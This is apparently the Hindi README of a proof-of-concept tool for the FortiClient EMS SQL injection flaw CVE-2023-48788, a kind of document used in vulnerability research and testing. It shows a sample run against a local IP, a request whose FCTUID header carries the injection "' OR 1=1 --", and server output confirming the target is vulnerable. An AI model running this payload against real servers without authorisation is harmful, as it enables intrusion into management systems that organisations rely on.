
Fortinet FortiClient EMS SQL इंजेक्शन भेद्यता (CVE-2023-48788) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के SQL इंजेक्शन प्रदर्शित करता है, जिससे सिस्टम जानकारी निकाली जा सकती है और लक्ष्य की संवेदनशीलता की पुष्टि की जा सकती है।
FortiClient EMS CVE-2023-48788 के लिए एक शोषण प्रूफ ऑफ कॉन्सेप्ट
अधिक विवरण यहाँ: https://www.horizon3.ai/attack-research/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive
$ python3 CVE-2023-48788.py -t 192.168.1.3 -p 8013
[+] Sent Message!
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1 --
IP=127.0.0.1
MAC=00-50-56-11-22-33
FCT_ONNET=0
CAPS=32767
VDOM=default
EC_QUARANTINED=0
SIZE= 1600
X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREU9Vk13YXJlIFZpcnR1YWwgUGxhdGZvcm0KUlNFTkdfVkVSPTEuMDAwMjAKQVZfUFJPVEVDVEVEPTAKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPQpFTkFCTEVEX0ZFQVRVUkVfQklUTUFQPTQ5CkVQX09GRk5FVENIS1NVTQ==
X-FCCK-REGISTER-END
b'FCKARPLY: CONT|1|EMSSN|FCTEMS0000125605:DESKTOP-RFJJIFA|UPLD_PRT|8013|KA_INTERVAL|60|LIC_FEATS|283004|LIC_ED|1867910400|AUTH_PRD|0|SNAPTIME|0|QUAR|0|AVTR|1|AV_SIG|92.02456|SERIAL|56F9B1CCCB1ABD1B69E05B3A451A1A1656032602|EMS_ONNET|0|TAGS|000000000000000000000000000000000000000000000000000|\r\n'
[+] The target is vulnerable!
यह सॉफ्टवेयर पूर्ण रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग प्रणालियों पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहाँ स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए उत्तरदायी या जिम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।